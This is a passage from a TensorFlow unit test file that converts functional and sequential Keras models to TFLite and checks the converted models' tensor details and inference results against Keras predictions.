interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
tflite_result = interpreter.get_tensor(output_details[0]['index'])
keras_model = keras.models.load_model(keras_file)
keras_result = keras_model.predict(input_data)
np.testing.assert_almost_equal(tflite_result, keras_result, 5)
os.remove(keras_file)
def testFunctionalModelMultipleInputs(self):
"""Test a Functional tf.keras model with multiple inputs and outputs."""
with session.Session().as_default():
a = keras.layers.Input(shape=(3,), name='input_a')
b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
c = dense(a)
d = dense(b)
e = keras.layers.Dropout(0.5, name='dropout')(c)
model = keras.models.Model([a, b], [d, e])
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.mae],
loss_weights=[1., 0.5])
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 4))
output_e_np = np.random.random((10, 4))
model.train_on_batch([input_a_np, input_b_np], [output_d_np, output_e_np])
model.predict([input_a_np, input_b_np], batch_size=5)
fd, keras_file = tempfile.mkstemp('.h5')
try:
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
# Convert to TFLite model.
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
os.remove(keras_file)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('input_a', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('input_b', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(2, len(output_details))
self.assertEqual('dense_1/BiasAdd', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 4] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
self.assertEqual('dropout/Identity', output_details[1]['name'])
self.assertEqual(np.float32, output_details[1]['dtype'])
self.assertTrue(([1, 4] == output_details[1]['shape']).all())
self.assertEqual((0., 0.), output_details[1]['quantization'])
def testFunctionalSequentialModel(self):
"""Test a Functional tf.keras model containing a Sequential model."""
with session.Session().as_default():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model = keras.models.Model(model.input, model.output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
model.predict(x)
model.predict(x)
fd, keras_file = tempfile.mkstemp('.h5')
try:
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
# Convert to TFLite model.
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check tensor details of converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('dense_input', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('time_distributed/Reshape_1', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# Check inference of converted model.
input_data = np.array([[1, 2, 3]], dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
tflite_result = interpreter.get_tensor(output_details[0]['index'])
keras_model = keras.models.load_model(keras_file)
keras_result = keras_model.predict(input_data)
np.testing.assert_almost_equal(tflite_result, keras_result, 5)
os.remove(keras_file)
if __name__ == '__main__':
test.main()
| xodus7/tensorflow | tensorflow/contrib/lite/python/lite_test.py | Python | apache-2.0 | 45,063 | 0.003107 |